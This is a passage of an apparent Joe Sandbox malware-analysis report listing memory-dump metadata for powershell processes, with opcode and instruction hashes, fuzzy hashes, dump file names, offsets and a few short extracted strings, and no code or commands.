                                  • Opcode Fuzzy Hash: 7c344b526234058ceefd08377788474415c761fc56d4041d682607984d3b2f64
                                  • Instruction Fuzzy Hash: DA412632A0DB894FEBD6EB2898516B97BE1EF56350F0800FBC44DC7193DA18AC49C756
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eb12c8c8cc0c88770d259f483a376b9433de603af7b0894a687007990499aa03
                                  • Instruction ID: a43f072498ec5fbf85e33c8551c4177ec98075cc07f8eb6c3eb9a8c4980480e6
                                  • Opcode Fuzzy Hash: eb12c8c8cc0c88770d259f483a376b9433de603af7b0894a687007990499aa03
                                  • Instruction Fuzzy Hash: 4331F422D2FB874FF3E9E6A868152B86AE0EF456D0F4841BAD41DD31D3DE085C044359
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1b26611f10300ee87193358b42ead8f19446dd4783e03a25720fd7bcb63999f4
                                  • Instruction ID: 7b14a6a83c2ba414943bee245e4cfaf3a541b0e3cf60b0bc7f417cd97b915b76
                                  • Opcode Fuzzy Hash: 1b26611f10300ee87193358b42ead8f19446dd4783e03a25720fd7bcb63999f4
                                  • Instruction Fuzzy Hash: 8521F821E1EB864FF3D9F72C644527566D2EF412A1F4901B9D10DC79D3EF19AC458309
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9841ea779b8bd3684fbead9f78944611629f9ff437c6af15065ef9c91e54d6d
                                  • Instruction ID: 236d7b0be52460f1fd307c73a68e2453d783884898cb46185cb5bc167f69f818
                                  • Opcode Fuzzy Hash: d9841ea779b8bd3684fbead9f78944611629f9ff437c6af15065ef9c91e54d6d
                                  • Instruction Fuzzy Hash: 5731F33081D68EAEFBB8AF15CC0ABF972E0FB46359F404139D40E86592CB786985CF15
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: df5222ce1d83bee1faf7a251ce4de2f88cac4d2aad366fc0beadbd176ee9c177
                                  • Instruction ID: a9a0b972dc97926d6657a8e91b2279ff6023b68ce8bcca86cb1965a6459426a3
                                  • Opcode Fuzzy Hash: df5222ce1d83bee1faf7a251ce4de2f88cac4d2aad366fc0beadbd176ee9c177
                                  • Instruction Fuzzy Hash: F521B022E0EBC65FF395A63C28591786AE1EF566A0F0901FBC049CB1D3DD0C5849832A
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 949349dd5e7546057f43d9c799316b721036ce44e191e71955fa1cf6d3353571
                                  • Instruction ID: 1a32ed6c70974e25b7d3908d4a9bde0109c9a2d8adb30827418e2a84dc1faae2
                                  • Opcode Fuzzy Hash: 949349dd5e7546057f43d9c799316b721036ce44e191e71955fa1cf6d3353571
                                  • Instruction Fuzzy Hash: CA21A421E0E7854FE75AE7686C522E8B7A1FF46250F0401FAD05D871C3DE2868488745
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b85faad778aa42e81705c22ec5c24c19ac6ff5c39dd712d1a8ad78f7e54fcb78
                                  • Instruction ID: 9585ec2120df8d447248611ccacf956105d87cfabdafc465b29b99fadde7a573
                                  • Opcode Fuzzy Hash: b85faad778aa42e81705c22ec5c24c19ac6ff5c39dd712d1a8ad78f7e54fcb78
                                  • Instruction Fuzzy Hash: 1701F721A0EFC55FE79AEB6898929657BE0EF1675070800EAC04DCB1C3C9089C48C3A1
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2203679900.00007FF848BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BD0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848bd0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d5f8bd4930a63cdbcd6f9a23957c342ff1d62f78ef99ce6612c7dcee371064b
                                  • Instruction ID: 789280c2397dc49948436df067cab381d49f99f6f2b7a8b630790011de137695
                                  • Opcode Fuzzy Hash: 0d5f8bd4930a63cdbcd6f9a23957c342ff1d62f78ef99ce6612c7dcee371064b
                                  • Instruction Fuzzy Hash: 3401677111CB0C4FDB44EF0CE451AA5B7E0FB99364F10056DE58AC3691DB36E892CB45
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9b18d3c51d5a8c770926a481bdfeebb71efcf1d6aac75350895b2131b37d375c
                                  • Instruction ID: e2ffea7847b0bc2a09608227d64ba0e417431b359a1038783d5b22df42e907fa
                                  • Opcode Fuzzy Hash: 9b18d3c51d5a8c770926a481bdfeebb71efcf1d6aac75350895b2131b37d375c
                                  • Instruction Fuzzy Hash: 78F0A921E0DB855FEBD5EA6C988257477D0EF15750B0804FAD01DC71D3DE18AC558365
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 018932e434c182ead397dfacf66fc2a01728c66f468ba0d2045470a94d6d52c4
                                  • Instruction ID: 6c986c4e212d7e6753abf0ea7903a56eca0bab544ae8f7a6dfa507b2572bb15d
                                  • Opcode Fuzzy Hash: 018932e434c182ead397dfacf66fc2a01728c66f468ba0d2045470a94d6d52c4
                                  • Instruction Fuzzy Hash: 7BF0E533A5DA0C4EE385E62C64052F9B3D2EFC8171F550277C14ED3156EF25D85A4244
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2204687924.00007FF848CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ff848ca0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 15155013172490c00facc4c66896a05c4aab742b01e28929c4c211dd098ef66a
                                  • Instruction ID: 019a2edfd87f07f803110ad436312c94f8637c4d252477f71d22d0b6b8b30cda
                                  • Opcode Fuzzy Hash: 15155013172490c00facc4c66896a05c4aab742b01e28929c4c211dd098ef66a
                                  • Instruction Fuzzy Hash: 49E09B32F6EB090EFBDDA51D78122F9A3D1EF85161B54147FC14FC2483EE16AC164249
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cbaac8c0bc081b644fde0725e4b38eee8c16f566ef6d5637156d3421d4787cd4
                                  • Instruction ID: 9919bdec62d79a9b3ecc1fd5430ed99900771f2da6714c975c136a71ae5f30be
                                  • Opcode Fuzzy Hash: cbaac8c0bc081b644fde0725e4b38eee8c16f566ef6d5637156d3421d4787cd4
                                  • Instruction Fuzzy Hash: B2B15171E00209DFDF10CFA9E98579EBBF2BF88314F148529E416A7294EB74A845DF81
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad38b72e316e01f0907669982287dae6f60a5ff18f53ac8aadc08070ea694973
                                  • Instruction ID: 91acc7fbfc82bdff2caee4beb3d39accbb5f20f5ff1bd0c6e360ce5ce7871780
                                  • Opcode Fuzzy Hash: ad38b72e316e01f0907669982287dae6f60a5ff18f53ac8aadc08070ea694973
                                  • Instruction Fuzzy Hash: A3B16472E00209DFDF14CFA9E98179DBBF2BF88314F148529D41AE7254EB74A845DB81
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                  • API String ID: 0-1355183119
                                  • Opcode ID: b12a0567896a478a4ed27773506b58bfbdd0e447f83def86b84b14972c01766d
                                  • Instruction ID: a6d83b606961611d91508582cfd62c82f701bb6f208a7dea6e9cdaf57c6b1d5c
                                  • Opcode Fuzzy Hash: b12a0567896a478a4ed27773506b58bfbdd0e447f83def86b84b14972c01766d
                                  • Instruction Fuzzy Hash: 6B3258B1B31207CFCB68AF78845066ABBE2AF85311F94847AD945CB2D5DB37C841C7A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                  • API String ID: 0-78369665
                                  • Opcode ID: 134a9ad0d9c320dbd3f813410c3399e7ab268b72efa0bc08fe5da344144f8ac4
                                  • Instruction ID: aa3d5d8c75ed6f29895cef7a188615bacd35ba0cd5a106c83563f9c475cb9139
                                  • Opcode Fuzzy Hash: 134a9ad0d9c320dbd3f813410c3399e7ab268b72efa0bc08fe5da344144f8ac4
                                  • Instruction Fuzzy Hash: 72E158B1725247CFCB69EF28C4502AABBE2FF85611F1484ABD845CB2D6DB36C841C761
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                  • API String ID: 0-471056614
                                  • Opcode ID: b8a4d8d3e618527a5c531d1a260b23c186bc7f87427a0e0651ef11a43c6c064b
                                  • Instruction ID: c4255fd09de6e141c6ab83ffb83dfee2d3db3da98535ca615d81082c183978c8
                                  • Opcode Fuzzy Hash: b8a4d8d3e618527a5c531d1a260b23c186bc7f87427a0e0651ef11a43c6c064b
                                  • Instruction Fuzzy Hash: 4942B2B0A21219CFD764DF98C954B69BBB2FF85304F2085A9D505AB395CB32EC81CF91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q$4']q$4']q
                                  • API String ID: 0-471056614
                                  • Opcode ID: 362d98bc030943b96713652a7f1e68f04a7ea9c0459a2e11ffa74877af727115
                                  • Instruction ID: 18e7e6555cfd8ab7cf77e76839a058986e89cf84422114a2c197fb79a39103a1
                                  • Opcode Fuzzy Hash: 362d98bc030943b96713652a7f1e68f04a7ea9c0459a2e11ffa74877af727115
                                  • Instruction Fuzzy Hash: E1D1C0B0A21205CFDB58EB68C550B9EBBA3EF84704F60C525D9016F395CB76EC45CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q$4']q
                                  • API String ID: 0-1785108022
                                  • Opcode ID: 6f934ea1626a5c5601799fd56f3eed69b90613e33ed4cf630d41491a1c234c73
                                  • Instruction ID: 50884025bd256d201f3a1ad6bf32cfddbd7d539e5c31628fe59111c451588560
                                  • Opcode Fuzzy Hash: 6f934ea1626a5c5601799fd56f3eed69b90613e33ed4cf630d41491a1c234c73
                                  • Instruction Fuzzy Hash: 891279B1B252428FCB65AB78881176A7FB2AFC1311F14C4ABC545DF2D2DE36C852C7A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Haq$$]q$$]q
                                  • API String ID: 0-1533201563
                                  • Opcode ID: ef1daa71f314d75d993d543a6afe2930c987cb3b295c7e0d42417adba8610199
                                  • Instruction ID: eb8a16d1d241ed80b1256fd2cbbb98e4fe77e191d22938a0b51e5c6f46e49491
                                  • Opcode Fuzzy Hash: ef1daa71f314d75d993d543a6afe2930c987cb3b295c7e0d42417adba8610199
                                  • Instruction Fuzzy Hash: E8121E34B001288FDB25DB64D8547AEB7B6BF89704F1484A9D40AAB361DF35AE81DF80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$$]q
                                  • API String ID: 0-1444653880
                                  • Opcode ID: e4a966c83f9fc7c788d464753d45facc9084a2637b5f0642df936ca11c1a0f3c
                                  • Instruction ID: 356a2413ae162f601e86dd2a9e09e9ae8d7b954362cb9ffb0a1094305e06b928
                                  • Opcode Fuzzy Hash: e4a966c83f9fc7c788d464753d45facc9084a2637b5f0642df936ca11c1a0f3c
                                  • Instruction Fuzzy Hash: 58A169B0B353468FDB65AB78881076A7BE29F92204F5484A6D541CF2E2DB37D844C7A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q$4']q
                                  • API String ID: 0-705557208
                                  • Opcode ID: 2366fb9c36edf6a5f80593b88feea6d6976a9e90b31c898efa81d173187ef7d4
                                  • Instruction ID: 9f212e910d22f06ff81da6489c7e1ecf5ad2537001015dc6f5c9cc5a6e812d1a
                                  • Opcode Fuzzy Hash: 2366fb9c36edf6a5f80593b88feea6d6976a9e90b31c898efa81d173187ef7d4
                                  • Instruction Fuzzy Hash: 20B1DFB0A21205CFDB54EF64C541B9EBBB2EF88708F60C555E8016F395CB76E885CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $]q$$]q$$]q
                                  • API String ID: 0-182748909
                                  • Opcode ID: 2a5021124e56e7aa2c6507db2e75c50bd22b5de03a0982361c51e6a83f099e1d
                                  • Instruction ID: adac87bdcbbe95d0a1d63936718641895918f3d447be2f09e81d9818eab98294
                                  • Opcode Fuzzy Hash: 2a5021124e56e7aa2c6507db2e75c50bd22b5de03a0982361c51e6a83f099e1d
                                  • Instruction Fuzzy Hash: D9415BB2B211168FCB74AA6D884036EB7E5EFC4614F14857AC945EB381DA33DD08C7E0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q
                                  • API String ID: 0-3120983240
                                  • Opcode ID: 660bfaa3a423bd3a98dea38e36b03d89312c6e51b9061fcbda881e05f0108394
                                  • Instruction ID: 7f8b4fadb18e5e4ac944176c75a7107859c5a63ce255c97927078c8d7b1d4174
                                  • Opcode Fuzzy Hash: 660bfaa3a423bd3a98dea38e36b03d89312c6e51b9061fcbda881e05f0108394
                                  • Instruction Fuzzy Hash: D2928BB0A10215CFE764EB18C944F59BBB2EF84304F10C5A9D909AB396DB72ED85CF91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q
                                  • API String ID: 0-3120983240
                                  • Opcode ID: 7161ca94b250383c021b482947fe2389e5fda6223cca4e68c66fec549d9fbecb
                                  • Instruction ID: eb147132c6fde9619f71dc464a0174a556d321ea53a7be7a1fe034436a3ad438
                                  • Opcode Fuzzy Hash: 7161ca94b250383c021b482947fe2389e5fda6223cca4e68c66fec549d9fbecb
                                  • Instruction Fuzzy Hash: EB12BEB0B212099FE754DB58C544BA9BBB2EF84704F24C069E905AF3D5CB72EC46CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q
                                  • API String ID: 0-3120983240
                                  • Opcode ID: 3e3c8abd055ba67db88fe019f30730c94d54a1be49b8305f4117ec617de53ee8
                                  • Instruction ID: e22b7ae01f7e648f2fdb67d1bbb7d87ba883b58f33014d5282444c4004262998
                                  • Opcode Fuzzy Hash: 3e3c8abd055ba67db88fe019f30730c94d54a1be49b8305f4117ec617de53ee8
                                  • Instruction Fuzzy Hash: EBF1F4B0B112148FD764EB68CD55B6EBBB2EF84304F1084A5D5096F392CB76ED81CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: tP]q$tP]q
                                  • API String ID: 0-145478062
                                  • Opcode ID: d486c7ed5ebad75a25a929edc12c6ba9f3bc29513068b8d6e229ecf223741bad
                                  • Instruction ID: 4b5a8607b642929cf51583e8240f62cf9bef7e37fba7dcf497b67809986d690a
                                  • Opcode Fuzzy Hash: d486c7ed5ebad75a25a929edc12c6ba9f3bc29513068b8d6e229ecf223741bad
                                  • Instruction Fuzzy Hash: 56417A706163429FC755DB68C86075EBFA1EF46B10F18848AE9849F2D3CB72DD06C7A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $]q$$]q
                                  • API String ID: 0-127220927
                                  • Opcode ID: 50adcc09438ea52aac5c69db9d33dfc20bf289442de1de877b6467784e0c6348
                                  • Instruction ID: 91c805cef7f5eaa18cf7d9861900910a769f1cc601407d47ab557dd5205689f6
                                  • Opcode Fuzzy Hash: 50adcc09438ea52aac5c69db9d33dfc20bf289442de1de877b6467784e0c6348
                                  • Instruction Fuzzy Hash: AA212BB6926356DFCB75AF2884402A5BFF0BF46210B1941A6CC84DB381D3329D08C7B1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q
                                  • API String ID: 0-1259897404
                                  • Opcode ID: 0ed5f5124ad8ad6b853166b898802fe0214131930417214cc2bee022fc5ace49
                                  • Instruction ID: 533a4b1d36f86b7ccaf06e444fea8488354aa76b9174643647fc6b436c31c5d7
                                  • Opcode Fuzzy Hash: 0ed5f5124ad8ad6b853166b898802fe0214131930417214cc2bee022fc5ace49
                                  • Instruction Fuzzy Hash: D1728CB4A10215CFE764DB18C984F59BBB2FB84304F14C599D909AB392CB72ED85CF91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q
                                  • API String ID: 0-1259897404
                                  • Opcode ID: d774f28a76f45a813ba0d2525bb180ea99a9adf70c0b4f475b41a506462f9740
                                  • Instruction ID: 67e59b5897a448352d0f3a18d6944ff4d4c718e45aeaeb53b170437ee923c773
                                  • Opcode Fuzzy Hash: d774f28a76f45a813ba0d2525bb180ea99a9adf70c0b4f475b41a506462f9740
                                  • Instruction Fuzzy Hash: 03229DB0A20205CFE764DB18C945FA9BBB2FB84704F14C595D909AB392CB72ED85CF91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q
                                  • API String ID: 0-1259897404
                                  • Opcode ID: 3fd5c1e87ae970286d2aa890830c2035a7ce64748e9b2bee8ae87dedb2e12146
                                  • Instruction ID: 182190f8b55e9a59a6b80c88a96f89a2bce01ebfc8589abcf64cd9145bd31cbe
                                  • Opcode Fuzzy Hash: 3fd5c1e87ae970286d2aa890830c2035a7ce64748e9b2bee8ae87dedb2e12146
                                  • Instruction Fuzzy Hash: FC12ABB0B21205DFEB54DB58C544BA9BBA2EF84708F14C459E905AF3D1CBB2EC46CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q
                                  • API String ID: 0-1259897404
                                  • Opcode ID: 8782aff07d80cfd0efd5e4a0bcd367c690be65f96bdd987414e733103440ce0e
                                  • Instruction ID: 0b17ac8fb21b421b8da1137e19bc220aef2905d2558c172bf4b7085bac040678
                                  • Opcode Fuzzy Hash: 8782aff07d80cfd0efd5e4a0bcd367c690be65f96bdd987414e733103440ce0e
                                  • Instruction Fuzzy Hash: B2028BB4B21209DFEB54DB58C544BA9BBB2EF84704F24C059E905AB3D1C7B2EC46CB91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q
                                  • API String ID: 0-1259897404
                                  • Opcode ID: 8d94188c1e9ee6a85b80fbf5d72f923fffc114f2e3030856d6b761fb3a2c7cd3
                                  • Instruction ID: 4dde6370b334ee1d3ec87e29381ba373b550788f11405e58210d489b9f69a920
                                  • Opcode Fuzzy Hash: 8d94188c1e9ee6a85b80fbf5d72f923fffc114f2e3030856d6b761fb3a2c7cd3
                                  • Instruction Fuzzy Hash: 0B41F6F0B352038FDBA4AF24C550B697BE3AB60248F988466D501DB2D5D777D940CBA1
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7493664e6ff7c4d05679c197ea77f204e095048da0a5d26db30f8148bb6bd734
                                  • Instruction ID: ef899f7e3577080a39e28a25f77f47aedf27d115ef6e2d78dd8204044d7e9cb2
                                  • Opcode Fuzzy Hash: 7493664e6ff7c4d05679c197ea77f204e095048da0a5d26db30f8148bb6bd734
                                  • Instruction Fuzzy Hash: 84221774A00209DFCB15CFA8D584AAEFBB2FF48310F258559E816AB365D731ED85CB90
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b34a06ed77b2e74f933345fd72d7c237b1f61b012b8d9730e2adbb10d8c1432
                                  • Instruction ID: e66877248392ffca9f57ad6fd08a588930bbb8c14e83b8f3901babc5497d130b
                                  • Opcode Fuzzy Hash: 8b34a06ed77b2e74f933345fd72d7c237b1f61b012b8d9730e2adbb10d8c1432
                                  • Instruction Fuzzy Hash: 4CD11674A00208EFDB14CF98D584AAEFBB6FF49310F248559E805AB365D731ED82DB94
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 410b9aa55f164e5e389aa506c4b7d12845ef1bddcfd4186e3cba302c01de6178
                                  • Instruction ID: dd72ec8404a4cf8a05f202a0d649ed9387e5e7f4fb66f5b78a4eeca8a0b39134
                                  • Opcode Fuzzy Hash: 410b9aa55f164e5e389aa506c4b7d12845ef1bddcfd4186e3cba302c01de6178
                                  • Instruction Fuzzy Hash: 72C1AFB1A00208DFCB14DFA8D584AADBBF6FF85314F118559E806AB365CB74ED49DB80
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f54bf2eaacec8074e31cfc6d6b8444221ac05ba72a7a82942590586341e9c88e
                                  • Instruction ID: ba440da25f81f28fac92ddf829652cdf15b7c17a3e065c0a7468591c901b524f
                                  • Opcode Fuzzy Hash: f54bf2eaacec8074e31cfc6d6b8444221ac05ba72a7a82942590586341e9c88e
                                  • Instruction Fuzzy Hash: 9BD1F574A00209EFDB14CF98D584A9DFBB6FF88310F248559E80AAB365C731ED85DB90
                                  Memory Dump Source
